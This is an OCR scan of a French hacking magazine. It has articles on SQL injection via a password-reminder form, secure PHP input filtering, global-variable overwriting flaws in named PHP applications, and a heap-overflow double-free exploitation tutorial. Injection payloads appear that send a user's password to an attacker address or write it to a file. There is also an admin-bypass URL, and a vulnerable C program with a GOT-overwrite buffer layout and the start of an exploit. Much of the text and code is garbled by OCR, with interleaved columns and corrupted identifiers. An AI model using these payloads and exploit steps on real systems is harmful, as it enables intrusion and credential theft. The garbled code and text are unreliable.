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Hacker@emai. com 

Subject : Your Password 
From : webnaster@bugged .com 
Content-Type: plain/text 
Hello, 

Your password : wa4j7p6 

Bye ! 

L'header To: peut contenir plu- 
sieurs adresses, séparées par des vir- 
gules, qui vont toutes recevoir une 
copie. Il y a donc ici deux destinatai- 
res :' OR Togin='Bob! OR 1=' et hac- 
kerdemail.com. Le premier envoi 
renverra peut-être un message d'erreur 
à l'expéditeur (webmaster@bugged.com, ce 
qui peut alerter l'administrateur), mais 
le deuxième sera bien renvoyé à hac- 
ker@email.com, avec le mot de passe 
de Bob. 


sûr toute une ribambel- 
‘s, comme par exemple 
© OR Togin="Bob'#, hacker@enei 1. com, ou 
encore  hackerdemail.com, ' 0R 
Togin=" Bob, 
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= Programmation PHP sécurisée 


Filtrage correct des paramètres utilisateurs 


La majorité des bugs de sécurité, et pas seulement en PHP peut être évitée avec 
un filtrage approprié des paramètres utilisateurs. L'exploitation de ces failles, 
comme dans l'article précédent, consiste en effet à donner des valeurs très 
différentes de celles qui étaient attendues, ce qui cause le dysfonctionnement 


recherché. Voi 


haque variable éntran- 

te (et modifiable par 

l'utilisateur) doit être 
traitée séparément selon le 
type attendu (mot, nombre, 
chaîne, etc.). Dans le cas 
d'une chaîne de caractères, 
par exemple, qui sera utili- 
sée dans une requête SQL, 
on voudra éviter qu'elle 
contienne des guillemets, 
simples ou doubles, ou tout 
autre caractère ayant une 
signification spéciale. 


Il y a donc deux maniè- 
res de faire : 

Soit supprimer ces 
caractères (ou les remplacer 
par autre chose) avec par 
exemple la ligne suivante, 
qui remplacera les caractè- 
res "et par le caractère ? : 
$var = preg_replace("([\'\"1)", 

"2" Svar); 

- Soit faire en sorte qu'ils 
soient considérés comme 
faisant partie d'une chaîne 
de caractères, et pas comme 
des séparateurs de la syn- 
taxe SQL. Par exemple: 
SELECT * FROM tutos 
WHERE title="Le \'Euple\'" 
AD contenu LIKE ‘#1\'slephantt" 

Ici on voit clairement en 
rouge que les caractères " et 
‘ peuvent être considérés 
comme des caractères nor- 
maux, lorsqu'il sont précédés 
d'un backslash (on dit qu'ils 
sont échappés). Il est possi- 


ble de le faire automatique- 
ment en mettant magic_quo- 
tes_gpc à ON dans le fichier 
php.ini. Mais il me semble 
préférable d'agir directe- 
ment dans le code, pour bien 
être sûr de ce qui peut où 
pas être entré comme valeur. 


Voyons donc le code 
PHP Si on a la ligne 
sresult = mysgl_query( 

ELECT passwd FROM membres". 

"WHERE emaîl='$email ‘"); 
et si le hacker veut récupé- 
rer le mot de passe de Bob 
dans un fichier " result.txt 
", il lui suffira d'entrer 
comme valeur à $email : ‘ 
OR login="Bob" INTO OUTFILE 
‘result.trt. 

Si maintenant j'utilise la 
fonction addslashes() en 
remplaçant la ligne de code 
précédente par ces deux 
lignes : 


if (get magic_auotes_gpe()) { 
Semai1 = addslashes($emai1); 

} 

fresult = mysql_query( 
"SELECT passud FROM membres" . 
“HHERE emai1='semeil" "); 


alors la requête SQL sera : 
SELECT password 

FROM menbres WHERE emai 

OR login=\ 

INTO OUTFILE \'/result. txt! 

L'attaque est ici inopé- 

rante. J'ai tenu compte de la 


MAI-JUIN 


fonction  get_magic_quo- 
tes_gpc() pour ne pas mett- 
re plus de backslashs qu'il 
n'en faut. N'oubliez pas de 
tenir compte également des 
éventuels stripslashes() se 
trouvant dans le code. On 
peut aussi utiliser 
mysql_escape string(), qui 
est plus spécialisée (elle 
tiendra donc compte des 
éventuelles évolutions de la 
syntaxe de MySQL). 


Voyons maintenant ce 
qu'il en est si la variable 
entrée doit être numérique. 
On sait maintenant que 
cette requête : 
$result = mysql_query( 

"SELECT mlogin FROM membres”. 
NHERE. mt d=smen id"); 


pourrait servir par exemple 
à injecter un UNION sans 
nécessairement utiliser de 
caractère " ou '. Les mesu- 
res présentées plus haut ne 
sonbt donc pas suffisante, Il 
y a pourtant tout une 
ribambelle de solutions. 


La fonction _intval() 
convertit les variables en 
type integer, Rajoutons 
cette ligne : 
$menid = intval($memid) ; 
fresult = mysql_queryt 
"SELECT login FROM nenbres. 
". AHERE mid=$nemid"); 

De manère équivalente, 
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, en pratique, comment on évite ces problèmes. 


on peut forcer le type d'une 
valeur (casting) : 
$nemid = (int)Smemid:. 

On peut utiliser d'autres 
types ( (bool) ou (boolean), 
(int) ou (integer), (real), 
(double), (float), ….). 

Dans les deux cas, si la 
valeur n'est pas numérique, 
elle est annulée. 


On peut également véri- 
fier Le type avec la fonction 
is numeric, en ajoutant plu- 
tôt la ligne : 

Snemid = 
1 numeri c($memi d) 2$nenid:2; 

J'utilise ici is numeric(), 
mais il y à une fonction pour 
chaque type : is float(), 
is integer(), is_string(), 
is_array(),… 


Pour convertir, on aurait 
pu enfin utiliser la fonction 
settype() avec la ligne : 
settype( Send, "int" ); 


Enfin, voici une solution 
qui est loin d'être la 
meilleure mais qui est pour- 
tant beaucoup utilisée :). 
Elle consiste à considérer, 
dans les requêtes, toutes les 
variables comme des chai- 
nes, c'est-à-dire en l'entou- 
rant de ‘ ou de ", tout en la 
filtrant avec addslashes : 
$result = mysql_query( 

"SELECT nlogin FROM membres ". 
“HHERE nid=' Smemid'"); 
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Écraser 
les variables PHP 


Une classe importante de 
vulnérabilités php n'est pas 
couverte par les deux articles 
précédents. Elle concerne une 
méconnaissance des mécanismes 
et des priorités qui régissent 
l'attribution des variables 
globales dans un script, qui peut 
permettre à un pirate de 
contrôler des élément de 
configuration ou de contourner 
des filtres. Précisons ces notions. 
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> : 


Super-glo 


Introduction aux super-globales 
Il y a plusieurs sortes de 
variables en php : les variables 
définies dans les scripts, celles 
provenant de la requête http 
(GET lorsqu'elles sont dans l'url, | 
POST pour les formulaires, plus 
les variables contenues dans les 
cookies) et celles qui sont 
générées par le serveur. Il peut 
arriver que des variables de 
sortes différentes aient le même 
nom. On peut cependant les 
différencier en spécifiant 
explicitement leur provenance. 
Les tableaux $GET (ou 
SHITP_GET_VARS), $_POST (ou 
SHTTP_POST_VARS),$_COOKIE 
(ou $HTTP_COOKIE_VARS) et 
$_ REQUEST (qui est la synthèse 
des trois précédents) contiennent 
les variables envoyées par http. Le 
tableau $_GLOBALS contient les 


<? 


bales 


BY FROG-M@N : 


Scripts qui n'initialisent pas cor- 
rectément certaines variables 
(on pense que c'est une variable 
interne au programme alors que 
l'utilisateur peut en réalité 
modifier sa valeur), 


Par contre, lorsque des varia- 
bles de sources différentes (par 
exemple,GET et POST) ont le 
même nom, la valeur de la varia- 
ble globale est attribuée selon 
une priorité donnée, On va voir 
dans cet article que cela est éga- 
lement une source de failles de 
sécurité. 


Les priorités 


Imaginons un fichier 
Mip//nnitagturl/pioitesphp contenant 
le code suivant : 


echo "GET + *,SHTTP_GET_VARSC'MYVar"]: 


echo 
echo "\n<br>£O0) 


> 


variables définies dans le script | 
ou. autre chose que nous 
verrons par la suite. Il y a aussi 
$_ENV (variables 
d'environnement de l'OS) et 
$_SERVER (adresse du client, 
referer, etc.), mais ils ne seront 
pas utilisés dans ce texte. 


Lorsqu'il n'y a pas d'ambi- 
guiïté, et lorsque register_globals 
est enclenché dans la configura- 
tion de php, on peut accéder à 
un variable donnée dans l'url 
(httpyisite.con/index.php?myVa 
r=0) aussi bien avec $myVar 
qu'avec $ GET['myVar']. Cette 
équivalence provoque souvent 
des failles de sécurité dans les 
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\nbr>POST 


echo "\n<br>GLOBAL : 


SHTTP_POST_VARS["MyVar"]; 
-SHTTP_CODKIE VARSC"MyVar"]; 
"fMyVar; 


On peut tester les priorités 
en envoyant une requête conte: 
nant la variable My Var sous plu- 
sieurs formes (get, post et 
cookie). Pour cela, on utilise un 
script python (voir encadré). 


On obtiendra alors comme résul- 
tat, côté client : 
GET : GetValue 
<br>POST : PostValue 
<br>COOKIE : CookieValue 
<br>GLOBAL : CookieValue 


On peut donc en conclure 
qu'une variable COOKIE est en 
quelque sorte plus ! puissante " 
que les variables GET et POST, 


er 
nt 


PHPPrioCheck.py 


Super-globales 


Ce programme permet d'envoyer une requête http initialisant la variable MyVar 


de différentes manières. 
Amport httplib 


hétp=httplib.HTTPC'wn.target.ur1") 


hitp.putrequest ("POST", "/priorites. php?HyVar=GetValue") 

http putheader("Content-Type”, "appl ication/x-wn-form-ur1encaded" ) 
http putheader ("Cookie", MyVar=Cooktelal ue”) 

http putheader("User-Agent","PHPPri oCheck. py") 


http patheader{"Hosi", "mu. target url") 


http putheader("Content- Length", str(len("MyVar=PostValue"))) 


http.endheadersC) 

http. send("Myar=PostValue") 

code msg,headers = http.getreply() 
print code,"\n,msg, "in", headers 


file=http.getfile() 


print "Result : \n“+file.read() 


car c'est à elle qu'une variable globa- 
le prendra sa valeur en priorité. 
Avant de parler des conséquences, 
voyons les priorités entre GET et 
POST, en supprimant simplement la 
ligne http.putheader(" Cookies ”, 
“MyVar=CookieValue "). 
Ce qui donne le résultat : 
GET : GetVélue 
<r>POST : Postlalue 
<r>C00KIE : 
<br>6LOBAL : PostValue 


Les variables du tableau $_REQUEST 

réagissent exactement de la même 

façon que les variables du tableau 

$ GLOBALS. 

On peut maintenant définir l'ordre des 

priorités : 

1. COORIE 

2.POST (comprenant le tableau 
$_FILES, les fichiers envoyés par 
formulaire) 

3.GET 
Cet ordre est en fait défini lui aussi 
dans le phpini par l'option " varia- 
bles_order " qui est par défaut " 
EGPCS ", c'està-dire Environne- 
ment, GET, POST, COOKIE, Serveur. 


L'ordre de priorités pour les varia- 
bles de type GPC est donc bien, par 
défaut, celui que nous avions déduit. 
Les conséquences de ces priorités 
peuvent être dangereuses si, dans tn 
code php, on fait des vérifications sur 
une variable dont on spécifie le type, 
puis que par la suite on l'utilise sans 
spécifier le type. 
Par exemple avec ce code (include.php) : 
<? 
FC eregiC"\.\.",5 GETL'FiTe"1) 
11 eragi("\\",$ GETE"#iTe"]) 
11 eregi(* _GET("fi1e"]) 
11 eregt'\\g",s GETD"fite"]) ){ 
die("Illegal access"); 
}slse { 
LL 
file exists("/files/".sfile) ) 
include("/files/".$file); 


) 
> 
Ici, il suffit d'envoyer un cookie 
nommé " file " et contenant la valeur 
" AJ.fe/to/show " sur l'url 
http//nwitargtur/Include.php?fle-Hlabla pour 
inclure le fichier " ./. le/to/show ". 
En effet, les tests vérifiant que la 
variable GET file ne contient ni " ..",ni 
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,ni"/",ni * \0 "sont effectués sur 
la veleur ! blabla ". Par contre, lors de 
l'inclusion, Le type n'est pas donné, et vu 
les priorités, si on a donné le nom " file 
"à un cookie, c'est sa valeur qui sera 
prise en compte alors qu'aucune vérifi- 
cation n'a été faite à son sujet. Pour un 
exemple réel, voir TrueGalerie qui per- 
mettait de copier et d'uploader des 
fichiers à cause des priorités 
Ctp;//v phpsecure.nfo/2/tuios/fog/TueGclere-rt). 


IL est évident que ce genre de pro- 
blèmes ne se posera pas avec un 
COOKIE, étant donné qu'il est en haut 
de la liste des priorités. Mais cet ordre 
peut être modifié. 

Plusieurs solutions sont envisagea- 
bles pour ne plus avoir de problèmes : 

1. Utiliser uniquement des variables 
de type $_REQUEST, reprenant les 
trois types; GET POST et COOKIE. 

2. Utiliser partout, sans se tromper, 
les bons types de variables (beau- 
coup plus dangereux :)). 

3. Ne JAMAIS définir le type de la 
variable. 

4. Mettre register_globals à off et lire 

la suite de l'article :) 


Simulation de register_globals 


Il est possible en php, avec un petit 
code, de simuler l'option register_glo- 
bals à " on " quand elle est sur " off". 
J'ai trouvé de nombreux moyens pour 
aller dans ce sens, mais aucun n'est 
valable pour simuler au contraire un 
register_globals à " off " alors qu'il est 
ä"on". 

Ce genre de code est souvent utili- 
sé dans des applications distribuées, 
permettant d'être compatible avec les 
deux configurations, ou par des web- 
masters dont l'hébergeur ne permet 
pas de changer la configuration du 
phpini. 

Le code suivant constitue un exemple : 

< 

foreach ($ REQUEST as $key=>svalue) { 
${$key} = $value: 

Ë 

echo fboum; 

> 

Grâce à lui, la variable $boum pour- 
ra être définie par GET, par POST ou 
par COOKIE, que l'option register_glo- 
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bals soit sur " on " ou sur " off ". Dans 

cet exemple, $(Skey] aurait pu être 

remplacé par $_GLOBALS[Skey]. 
Voyons maintenant l'utilisation pos- 

sible des fonctions extract() et 

import request_variables() : 

« 

extract($_ REQUEST); 

echo #boun; 

> 


< 
‘import_request_variables( 'GPC'); 
echo $boun: 

> 

Etc. 


Dans tous ces exemples, Sboum 
aurait pu être remplacé par $ GLO- 
BALS|"boum"]. 

Tous ces codes sont très pratiques, 
mais ils peuvent poser de sérieux pro- 
blèmes. On peut en effet redéfinir 
n'importe quelle variable glabale déjà 
définie dans le script, quel que soit l'é- 
tat de register_globals. 

Le code dangereux se trouvant 
après la définition de la variable 
$adminpass, il est possible de la redé- 


Imaginons un code tout simple : 

< 

Sadninpass="blob"; 

foreach ($_REQUEST as $key=>value) { 
${$key) = $value; 

} 


if (lisset(fpass) { 


lisent ce genre de code. 


A) Nukev-KLAN 81.6 


Des variables pourraient être redé- 
finissables en global, via GET, POST et 
COOKIE. 
nuked php + 


function nk_globals(ftable) { 
if (is array(SGLOBALS[Stable])) { 
reset(#GLOBALS[$able]); 
while (Tist(fkey, $val) = 
each(SGLOSALS[Stable])) { 
SGLOBALS[Skey] = $val; 
} 
} 
} 


glébals.php : 


nk_globé1s("HTTP_GET_VARS'); 
nk_globals('HTTP_POST_VARS' ); 
nk_globals("HTTP CODKIE VARS'); 
nk_globals(*HTTP_SERVER_VARS' ); 


Le problème dans ces scripts, est 
qu'une autre faille permet d'inclure 
globals.php dans n'importe quel modu- 


echo "<form method=\"POST\">Entrez le mot de passe :<br>"; 
echo "<input name=\'pass\"><br<input type="submit"s</Form" ; 


+ else { 
4F C Spas — fadminpass ) { 


echo "Bienvenue dans la partie administration." ; 


} 


finir, On sera donc considéré comme 
admin avec une simple url : hitp://wwter- 
geturl/admin php?adminpass-hop&pass-hop. 

Ce genre de code ne pose donc pas 
de problème sil se trouve avant toute 
définition de variable globale. 

Voici cing applications, dans leur 
dernière version à cette date, qui uti- 
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le, et donc de pouvoir changer diver- 
ses variables de configuration avec des 
requêtes GET. 


Chip nan phpsecure:fo/12/utosfrog/ Nue Ha.) 
8) XOOPS 2.0.5 

Des variables globales pourraient 
être redéfinies via POST. 
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edituser.php, imagemanager-php : 


4f (isset(SHTTP POST VARS)) { 
foreach (HTTP POST_VARS as $k => SV) { 
SEK) = #5 
} 
} 


On peut ainsi redéfinir certaines 
variables locales avec une requête 
POST, parce que cette portion de code 
est précédée par d'autres initialisa- 
tions. 
{http;//iman.phpsecure inf 42/tutos/rog/XOOPS20.5:t) 


€) Mameo Server 4.0.14 

Des variables globales pourraient 
être redéfinies via GET, POST et 
COOKIE si register._globals est à " off". 


regglobals.php : 


<tpho 
Âf Clini_get{'register globals')) { 
session start(); 
PR 
while(1ist($key, $value)= 
each(s_FILES)) $GLOBALST#key]=$ value; 
while(Tist($key, $value)= 
each($_ENV)) SGLOBALS[$key]=Svelue; 
while(Tist($key, $value)= 
each($_GET)) SGLOBALS($key]=Svalue; 
whilel[Tist($key, Svalue)= 
each($_POST)) $GLOBALSC$key]=$value; 
whila(Tist($key,Svalue)= 
each(s COOKIE)) GLOBALSCSKey1=$value; 
while(Tist{$key, Svalue)= 
each($_SERVER)) SGLOBALS[$key]=$value; 
Whilelist($key, $value)= 
each($ SESSION) $GLOBALS[$key1=$value; 
foreach($_FILES as $key = $value) { 
SGLOBALSCSkey] = 
$_FILESCSKey]C ‘tmp_name' 1; 
foreach(svalue as $ext = value?) { 
$key2 = $key."_".Sext; 
SGLOBALSE Skey21=$ val ue2; 


} 


} 
> 


Dans plusieurs composants, on a : 
include C'configuration.php"); 
(ul 

include ('ragglobels php"); 

On peut donc modifier la configuration 
du programme, 

ts] ua phnsecureinfo/\2/tuts/frog/MarmbaS ever bt) 


a 


Super-globales 


D) Yase SE 1.5.5 Solution <php 
Des variables globales pourraient extract(s_REQUEST, EXTR SKIP); 
être redéfinies via URL : Comme solution, j'ai composé deux | > 
querystring.php : codes pouvant permettre de simuler 
€) PHP-Nuke 7.0 register_globals à " on " quand il est La fonction extract() va définir tous 
Il est possible de redéfinir des varia- | à " off ", et pouvant être placés sans | les éléments du tableau donné en pre- 
bles globales via GET, POST et COOKIE | danger n'importe où dans le script: | mier argument comme étant des varia- 
si register_globals est à " off" bles globales, le tableau 
metnfile.php : php étant ici $_REQUEST. Le 
if (ini_get{"register clobals")){ deuxième argument défi- 
AfCstrlen(HOUERT_STRING) > 9) { foreach ($ REQUEST es $k=5v}{  nit le type de l'extrac- 
Sstr = (substr($QUERY STRING, 9, 5) = ‘uri=/" if (lisser (SGLOBALSESKT))£ tion, ici EXTR SKIP, 
2 SHTTP_SERVER VARSE"REDIRECT QUERY_STRING"] S{SkI=SV: c'est-à-dire qu'il n'écrase 
2 SQUERY_ STRING): } pas les variables globales 
$query_strings = split('[:8]', URLdecode($str)); } déjà définies. Ce dernier 
foreach ($query_ strings as $tmp) } argument est par défaut 
if Cpreg-mteh("/A(L=H)1=1(.#)/", Stmp, Sparts)) | ?> à EXTR OVERWRITE, 
$GLORALSC#parts[ 1] = hémlspecialchars($partsT27); c'est-à-dire qu'il écrase 
} Ce code ne s'exécute | les variables globales. 
que si register_globals 
et via POST, GET et COCKIE : est à ‘off ", Ensuite, il 
index. php, lews.php, SSL.php à va vérifier que les varia- Conclusion 
bles de type Voilà, tout ça prouve qu'il faut faire 
stypes_to_ register = $ REQUEST ne sont | très attention avec les super-globales, 
array('GET', ‘POST, 'COCKIE', "SESSION", 'SERVER'); pas déjà définies dans | quel que soit l'état de register_globals. 
foreach ($types to register as Stype) { le tableau des $_ GLO- Le deuxième phénomène s'est 
$arr = @S{'HTTP_' . Stype . ‘_VARS'}; BALS. Pour les variables | répandu à une vitesse assez grande 
if Câcount($arr) > 9) dont ça n'est pas le cas, | dans les applications php à cause du 
extract($arr, EXTR OVERWRITE); il va les y placer. L'a- | changement de configuration de php 
} vantage de cette possi- | par défaut qui met register_globals à 
bilité est que l'on peut | "off " à partir de la version 4.2.0. 
if Clini_get("register globals")} { placer un filtre sur toutes les variables 
import_request_ variables | 'GPC'); définies par l'utilisateur, ce qui n'est pas 
} possible dans ma deuxième proposition : 


Préinscriptions et infos 
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LE 


Tapez dans 


Heap overflows 
sur Linux 


Un buffer overflow dans la pile 
est, en général, directement 
exploitable, parce que les 
structures de contrôle que l'on 
peut y écraser dirigent 
explicitement le déroulement du 
programme. Mais que se passe-t- 
il lorsque le tampon est dans le 
tas ? Quelles structures peut-on 
modifier ? Comment exploiter un 
programme vulnérable ? 
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1. Introduction 


Depuis quelques années, on a 
pu voir débarquer de nombreux 
bugs d'un genre nouveau : les 
heap overflows, Ces bugs sont 
des débordements de tampons 
alloués dynamiquement par la 
fonction nalloc(). Dans cet arti- 
cle, je vous présenterai un cas 
d'école appelé double-free() ou 
encore unlink technique, dans le 
cas de l'allocateur par Doug Lea. 
C'est celui de la GNU LibC, pré- 
sent en particulier dans les sys- 
tèmes GNU/Linux. 

"This is not the fastest, most 
space-conserving, most portable, 
or most tunable malloc ever writ- 
ten. However it is among the fas- 
test while also being among the 
most space-conserving, portable 
and tunable. Consistent balance 
across these factors results in a 
good general-purpose allocator. " 
(source de GLIBC malloc ). L'al- 
locateur de Doug Lea (d1mal loc) 
tire son gros avantage de sa sim 


chunk > 


le tas 


BY PTAH 


plicité, Il sépare la mémoire en 
* arenas ', elles-mêmes sépa- 
rées en " chunks ". Dans ce 
papier, nous ne parlerons pas de 
la gestion des arenas parce que 
son intérêt reste très limité. 
Nous ne parlerons pas plus des 
algorithmes employés. Si vous 
voulez en savoir plus sur ceux- 
ci, consultez la bibliographie 
€], [4] et [SD. 


Il. Organisation en mémoire 
du dimalloc 


Le dimal loc sépare les arenas 
en chunks de tailles variables, 
On peut voir une arena comme 
un segment contigü de mémoire, 
Un chunk est une structure 
représentant un bloc alloué ou 
libre de mémoire, Les chunks lib- 
res sont classés dans une liste 
doublement chaînée dont les 
pointeurs sont stockés au début 
du chunk. Ainsi un chunk libéré 
aura la structure suivante en 
mémoire : 


prev. size: Taille du chunk précédent 


_ sve:Talle du chunk 


a : Pointeur vers le chunk précédant dans la liste 


bk : Pointeur vers le chunk suivant dans la Iste 


chunk => 


mem : size - 8 octets 


Suivant 
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Lors de l'allocation d'un chunk 
par nelloc(3), il commence par 
parcourir la liste des chunks lib- 
res pour en trouver un de taille 
adéquate, On ne détaillera pas la 
recherche de ce chunk ici (voir 
[1]). Une fois un chunk de bonne 
taille trouvé, il l'alloue et le chunk 
alloué ressembler à : 


Heap overflows sur Linux 


chunk => 
prev.size : Taille du chunk précédent 
size : Taille du chunk 
dus mem : size O0tets 
suivant 


On ne voit ici que mem over- 
write fd et ble. De plus size ne 
sera pas nécessairement de la 
taille demandée (ce sera au 
moins la taille demandée). 

La taille allouée sera donnée 
par la macro request2size [3], la 
taille renvoyée sera la taille 
demandée, plus les 8 octets pour 
le size et le prev_size, moins les 
4 octets du prev_size du chunk 
suivant (qui peut contenir des 
données) ; le tout aligné sur un 
multiple de 8 octets (la taille 
minimale d'allocation est de 8 
octets pour pouvoir ainsi stocker 
1es champs fd et bk). 


#define request?size(reg, nb) \ 
C(nb = (reg) + (SIZE_5Z + MALLOC_ALTGN MASK)),\ 
(Cong}nb <= 4 [1 nb < CINTERNAL SIZE T) (reg) \ 
? C_set_errno (ENOMEM), 1) 
+ COnb < CHINSIZE + MALLOC_ALIGN HASK) \ 
? (nb = MINSIZE) : (nb &= -MALLOC_ALIGN MASK)), 9))) 


Enfin, le champs size aura 
son bit de poids faible d'activé si 
le chunk précédant est utilisé et 
le deuxième bit (en poids) d'ac- 
tivé s'il a été obtenu par MMAP. 


Ill. Code de freel) 

Après quelques tests dépen- 
dants de l'architecture, free() 
appelle la fonction chunk free() 


qui est la véritable fonction de 
libération d'un chunk : 


/* size field is ared aith PREV_INUSE when previous adjacent 
chunk in use */ 


Hdefine PREV_IAUSE @xLUL 
static void chunk free(arena *ar_ptr, mchunkptr p) { 


INTERNAL SIZE T hd = p->s128; /* its head field */ 


INTERNAL_SIZE T 52; 7 its siee */ 
int idx; /* its bin index */ 
nchunkptr next; /* next contiguous chunk */ 


INTERNALLSIZE T nextsz; /* its size */ 

INTERNALL SIZE T prevsz; /* size of previous contiguous chunk */ 

mchunkptr bck; /* misc temp for linking */ 

mchunkptr vd; /* mise temp for linking */ 

ant isir; /* track whether merging with 
last_remainder */ 


check_inuse_chunk(ar_ptr, p); 
52 = hô & -PREV_INUSE; 


next = chunk at offset(p, 52); 
nextsz = chunksize(next) ; 


if (next = toptar-ptr)) { /* merge with top */ 
s2 += nextsz; 


æ if CIChd & PREV_INUSE)) { /* consolidate backward "/ 
prevsz = p->prev_size; 
p= chunk_at_pffset(p, -(long)prevsz); 
S2 + prevsz; 

+ unlinkip, bek, fud); 


set head(p, sz | PREV_INUSE); 

top(ar_ptr) = p; 

if (unsigned Tong)(sz) >= (unsigned 
Tong)trim_threshold) 


main_trim(top_pad); 


return; 


islr = 


if (IChd & PREV_INUSE)) { /* consdlidate backward */ 
prevsz = p->prev_size; 
p= chunk at offset(p, -(Tong)prevsz); 
52 += prevsz; 


/* bep as lest_remainder */ 


æ if (p->fd — last_remainder(ar_ptr)) 
istr 
else 
& unlink(p, bck, fud); 


/* consolidate forward */ 
if (I(inuse bit_at offset(next, nextsz))) { 
s2 += nextsz; 


/' te-insertlast_remainder */ 
æ if (lisir 8 next->fd = last remainder(ar ptr)) { 
isir = 1; 


Tink_last_remainder(ar_ptr, p); 
} 
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else 
æ unTink(next, bck, Fud); 

next = chunk at offset(p, sz); 
} 


else 
set_head(next, nextsz); /* ciear inuse bit */ 


set_headip, sz | PREV_INUSE); 
next->prev_size = 52; 
if (lisir) 

frontlink(ar_ptr, p, sz, tdx, bek, fud); 


Si <? le chunk précédant est marqué dans le champs 
size comme non utilisé (bit de poids faible à zéro), alors <3> 
on concatène le chunk précédant au chunk en cours (macro 
ulink), excepté si le chunk suivant dans la liste des chunks 
libres est le " dernier restant " > et que le chunk suivant 
(next) dans la mémoire n'est pas le premier <>. Sinon, <> 
si le chunk next a le bit INUSE d'activé, et <@ si le chunk 
next->fd n'est pas le " dernier restant " et que le test € ou 
<> a échoué, alors on concatène le chunk en cour avec le 
chunk next via unl ink <, Enfin, si l’on n°a toujours pas ren- 
contré le " dernier restant ", le chunk en cours est placé 
dans la liste doublement chaînée via la macro frontlink. 

La macro unlink permet de concaténer un chunk P avec 
son chunk précédant (BK et FD sont uniquement des varia- 
bles temporaires) : 


#define unlink(P, BK, FD){\ 
BK=P->bk; \ 
FD=P->fd; \ 
FD->bk = BK; \ 
BK->fd = FD; \ 
1 


La macro frontl ink recherche Le bon emplacement (selon 
sa taille) dans la liste des chunks : 


#efine frontlink(A, P, 5, IDX, BK, FD) £ \ 
À CS < MAX SMALLBIN SIZE) 
{ 
10X = smallbin_index(S); 
mark binblock(A, 1DX); 
BK = bin_at(A, 1DX); 
FD = BK->fd; 
P->bk = BK; 
P->fd = FD; 
FD->bk = BK->fd = P; 


} 

else 

{ 
10X = bin_index(S); 
BK = bin at(A, IDX); 
FD = Bk->fd; 
Àf (FD — BK) mark binblock(A, IDK); 


CCC Creer 
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while (FD 1= BK ä& 5 < chunks1ze(FD)) FD = FD->fd; 


else 
{ 

BK = FD->bk; 
} 
P->bk = BK; 
P->fd = FD; 


FD->bk = BK->fd 


bin_indersert à récupérer 
l'index d'un bin (liste de 
chunkes libres d'une certaine 
taille) et bin at l'adresse 
réelle de ce bin (mark binlock 
sert à marquer le bin 
comme non vide). 

On voit facilement que 
soit le chunk est considéré 
comme petit et ilest alors mit 
au début du bin des chunks 
petits, soit ilest inséré dans le 
bin correspondant en conser- 
vant l'ordre du bin (classe: 
ment par taille croissante). 


IV. Double-free() 


V1 Problème 


Si l'on regarde de plus 
près la macro unlink, on voit 
qu'unlink réalise : 


A(P->fd + 12) = P->bk 
#(P->bK + 8) = P->fd 


Donc, si on contrôle les 
champs fd et bk du chunk P 
(qui est dans le cas «> de 
chunk_free, le chunk suivant 
notre chunk), on peut écrire 
une adresse arbitraire par 
une valeur arbitraire, Si fd 
est à À et bk à B, alors on 
obtiendra à l'adresse A + 12 
la valeur B et à l'adresse B 
+ 8 la valeur À. II faut donc 
que À + 12 et B + 8 soient 
des adresses correctes. 

Sile chunk P à été réécrit 
Car overflow du chunke pré- 
cédant dans la mémoire) on 
peut réécrire des données en 
mémoire si ce chunk P est 
libéré, On peut générer ce 
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cocrosses 


bug lorsque deux buffers de 
taille avoisinante sont alloués, 
en produisant un overflow sur 
le premier, pour autant qu'il 
soit ensuite libéré. 


1V.2 Exploitation 


Maintenant, avec les 
mêmes notations, si À est 
mis à <retloc-12> et B à 
<retaddr>, alors le mot <ret- 
loc> sera mis à <retaddr>. Si 
<retloc> est, par exemple, 
l'enregistrement dans la 
GOT de free() et <retaddr> 
l'adresse d'un buffer que 
l'on contrôle, après l'appel à 
unlink, un appel à free() 
sera un appel à notre buffer 
(et donc à notre shellcode). 
11 faudra faire attention à 
sauter " les 12 premiers 
octets (vu que <retaddrt8> 
sera réécrit par unlink()). De 
plus nous voulons arriver au 
cas «7», il nous faut donc pas- 
ser le test <5 et faire 
échouer le test <& ; pour 
cela, il nous faut désactiver 
le bit INUSE du chunk sui- 
vant et se débrouiller pour. 
que le champs fd soit diffé. 
rent de last remainder (ce 
qui est facile). Enfin, les 
champs size et prev_ size doi- 
vent pouvoir être ajoutés à 
un pointeur sans provoquer 
de segfault (donc de très 
petite valeur), soit pour évi- 
ter les zéros, des valeurs 
négatives petites. Pour 
respecter ces considérations, 
on prend -PREV_INUSE 
comme valeur (1 & 
-PREV_INUSE) pour size et 
prev_size, soit Oxffifffic. 


Éd 


Heap overf 


à 
s 
4 


ee, 


Finalement, notre buffer d'overflow ressemblera à: | 


<go ahead 12><B octets><shellcode-padding<xffrffffe<pxrffifffeet loc-12><retaddr> 


V3 Exemple 


En prenant ce programme vulnérable : 


E+ vuln.c +] 
#include <std1ib.h> 
#include <tring.h> 
#include <stdio.h> 


void vuln(char *arg){ 
char *p_ = (char#)nal loc (199) ; 


char #p1 = (char*)mal 10c(109) ; 

strepy(p, arg); æ 
Free(p); s 
free(p1); 


} 


int mainint arge, char #*arov, char #*envp){ 
1f(argc != 2) return 8; 
vuln(rav(11); 
return 9; 

k 


C- vuin.c -] 


On remarque que les pointeurs p et p1 seront 
deux chunks qui se suivront en mémoire, On a over- 
flow sur le pointeur p en <> puis Hbération de ce 
pointeur en <>. On se retrouve donc dans le cas d'ex- 
ploitation décrit ci dessus. 

On va commencer par calculer la taille du 
chunk de p : request?size(198) = 194, Donc les ren- 
seignements du chunk suivant (le prev_size sui- 
vant) seront au bout de 96 octets et l'espace 
nécessaire pour l'overflow de 112 octets, 

Il nous faut à présent trouver l'adresse de 
retour, pour cela Itrace(1) nous sera très utile (c'est 
un programme traçant les appels de la LibC) : 
$ Itrace ./vuîn aaa 2>81 | grep malloc 
malloc(199) = Yx48049670 
melloc (189) = 2xf00496d8 

On voit donc que notre premier buffer sera 
alloué en 0x08049670, ce sera donc notre adresse 
de retour. Enfin, on veut changer l'adresse de free 
pour pouvoir appeler notre shellcode (.got over- 
writing, voir l'article " ELF Smashing " du 
Manuel 6), un petit objdump et c'est parti : 
$ objdump -R vuln | grep free 
98049640 R 386 JUMP_SLOT free 

Donc finalement notre overflow ressemblera à : 


<go ahead 12><8 octets><shellcode><pad><Oxffffifo><ixf ft 


\ J 
96 octets 
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Voici l'exploit correspondant : 


C+ xpl.c +] 
#include <stdio.h> 
#include <stdl ib.h> 


lows sur Linux 


V. Conclusion 


Ceci était une petite intro- 
duction au heap overflow dans le 
cas Le plus classique. Les bugs 
double-free() sont très courants 
et exploitables sur beaucoup de 
